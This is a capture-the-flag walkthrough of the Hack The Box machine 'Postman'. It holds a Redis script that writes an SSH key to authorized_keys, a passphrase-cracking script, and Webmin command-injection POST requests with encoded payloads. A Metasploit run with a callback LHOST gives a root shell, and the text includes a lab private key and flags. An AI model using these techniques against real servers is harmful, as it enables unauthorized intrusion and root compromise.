Hack the Box (HTB) – Postman

Scanning

IP=10.10.10.160

nmap -sT -p 1-65535 $IP
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-06 10:29 EST
Nmap scan report for 10.10.10.160
Host is up (0.097s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
6379/tcp  open  redis
10000/tcp open  snet-sensor-mgmt

Nmap done: 1 IP address (1 host up) scanned in 342.86 seconds

Solution for user Matt

  • Use redis exploit (see script exploit_redis.sh) to write my public key to authorized_keys
  • Connect to redis user with my private key
  • We find user Matt
./exploit_redis.sh
ssh -i /root/.ssh/id_rsa redis@10.10.10.160

redis@Postman:/home/Matt$ cat /etc/passwd | grep -v nologin
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
Matt:x:1000:1000:,,,:/home/Matt:/bin/bash
redis:x:107:114::/var/lib/redis:/bin/bash

Find Matt’s password

As redis user, connected with my private key

  • Explore files. We will find a backup of Matt’s private key in /opt/id_rsa.bak
  • Crack the private key (see script crack_private_key_rsa.sh)
  • We find passphrase for private key is computer2008
  • Escalate from redis to Matt and read the flag. Matt’s password is the same as his passphrase for RSA… classic password reuse scenario.
ssh -i /root/.ssh/id_rsa redis@10.10.10.160
redis@Postman:find / -name *.bak

redis@Postman:/home/Matt$ cat /opt/id_rsa.bak
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
-----END RSA PRIVATE KEY-----

# Escalate priv to Matt
su Matt
[computer2008]

Matt@Postman:~$ cat user.txt 
517ad0ec2458ca97af8d93aac08a2f3c

exploit_redis.sh

#!/bin/bash
#---------------------------------------------------------------------------
# Name : exploit_redis.sh
# Description : Postman challenge from Hackthebox
# Author : Lisandre.com
# Date : 2019-11-06
#---------------------------------------------------------------------------

# Change these configurations
TARGET_IP=10.10.10.160
TARGET_PORT=6379

RSA_KEY_PATH="/root/.ssh"
RSA_KEY_NAME="id_rsa_redis"

# Load RSA key in memory to workaround bug in redis
KEY=`(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n")`
echo "$KEY"

# Check if redis connection is working
echo "Testing connection to redis (expected: PONG)..."
redis-cli -h ${TARGET_IP} -p ${TARGET_PORT} ping

echo "Search for ssh key path on remote server..."
#redis-cli -h ${TARGET_IP} -p ${TARGET_PORT} config get '*'
# | grep ".ssh"

# upload remote shell /var/www/html
#echo "test redis" > ./redis.php

redis-cli -h ${TARGET_IP} -p ${TARGET_PORT} SLAVEOF NO ONE
redis-cli -h ${TARGET_IP} -p ${TARGET_PORT} config set dbfilename "authorized_keys"
redis-cli -h ${TARGET_IP} -p ${TARGET_PORT} config set dir "/var/lib/redis/.ssh"
#redis-cli -h ${TARGET_IP} -p ${TARGET_PORT} keys '*' > "/var/lib/redis/.ssh/authorized_keys"
echo "$KEY" | redis-cli -h ${TARGET_IP} -p ${TARGET_PORT} -x set crackit

echo "Saving configurations..."
redis-cli -h ${TARGET_IP} -p ${TARGET_PORT} save

echo "Additional commands:"
echo "redis-cli -h ${TARGET_IP} -p ${TARGET_PORT} cmd"

echo "CONNECT TO HOST ${TARGET_IP}"
echo "ssh -i /root/.ssh/id_rsa redis@${TARGET_IP}"

exit 0

crack_private_key_rsa.sh

#!/bin/bash
#===========================================================================
# Script     : crack_private_key_rsa.sh
# Description: Crack passphrase on RSA private key
# Author     : Lisandre.com
# Date       : 2019-11-07
#===========================================================================

# UPDATE CONFIGURATIONS HERE
WL="/usr/share/wordlists/rockyou.txt"
PRIVATE_KEY="/root/.ssh/id_rsa_Matt"
OUTPUT="/root/.ssh/password.txt"
RC=1

# Generate key to test
# openssl genrsa -des3 -out private.pem 2048

# Starting to crack...
echo "Cracking RSA private key passphrase..."

while IFS= read -r line
do
    echo "Password: $line"
    openssl rsa -in "$PRIVATE_KEY" -out out.key -passin "pass:$line" >> "$OUTPUT"
    RC=$?

    if [ "$RC" -ne 1 ]; then
        echo "Passphrase: $line" > "$OUTPUT"
    fi

    # Success message: writing RSA key
done < "$WL"

Solution for root user

  • We will use web application Webmin 1.910 on open port 10000 (previously found in the Scanning section): https://10.10.10.160:10000
  • Log in the application using user Matt and computer2008 password previously found.
  • Search on ExploitDB for Webmin.
  • This exploit should work https://www.exploit-db.com/exploits/46984. We can use Metasploit, but this is also very easy to do manually with Burp Suite. Looking at the exploit, we can see the vulnerability resides in /package-updates/update.cgi

Manually with Burp Suite based on EDB-ID 46984

  • Keep note of the sid cookie value when logged as Matt.
  • Intercept requests with Burp Suite. Send any request to the Repeater module
  • Replace the request with the content below, and change the sid cookie value.
  • Payload is: u=acl%2Fapt&u=%20%7C%20{command}&ok_top=Update+Selected+Packages

In this example, payload is ” | whoami”

POST /package-updates/update.cgi HTTP/1.1
Host: 10.10.10.160:10000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.10.10.160:10000/package-updates/?xnavigation=1
Connection: close
Cookie: redirect=1; testing=1; sid=a610ef6d5cedc69187c88645603442de
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 85

u=acl%2Fapt&u=%20%7C%20%77%68%6f%61%6d%69&ok_top=Update+Selected+Packages

Output

...
<b>Installing package(s) with command <tt>apt-get -y  install acl  | whoami</tt> ..</b><p>
<pre>root
</pre>
...

Payload: ” | cat /root/root.txt”, encoded: ” | $(base64 -d <<< Y2F0IC9yb290L3Jvb3QudHh0)”

POST /package-updates/update.cgi HTTP/1.1
Host: 10.10.10.160:10000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.10.10.160:10000/package-updates/?xnavigation=1
Connection: close
Cookie: redirect=1; testing=1; sid=a610ef6d5cedc69187c88645603442de
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 178

u=acl%2Fapt&u=%20%7c%20%24%28%62%61%73%65%36%34%20%2d%64%20%3c%3c%3c%20%59%32%46%30%49%43%39%79%62%32%39%30%4c%33%4a%76%62%33%51%75%64%48%68%30%29&ok_top=Update+Selected+Packages

Using Metasploit and “Package Updates Remote Command Execution” (EDB-ID 47984)

msfconsole
search webmin
use exploit/linux/http/webmin_packageup_rce
show options

set PASSWORD computer2008
set RHOSTS 10.10.10.160
set USERNAME Matt
set LHOST 10.10.14.17
run

[EXPLOIT IS WORKING!]
whoami
[root]
cat /root/root.txt
a257741c5bed8be7778c6ed95686ddce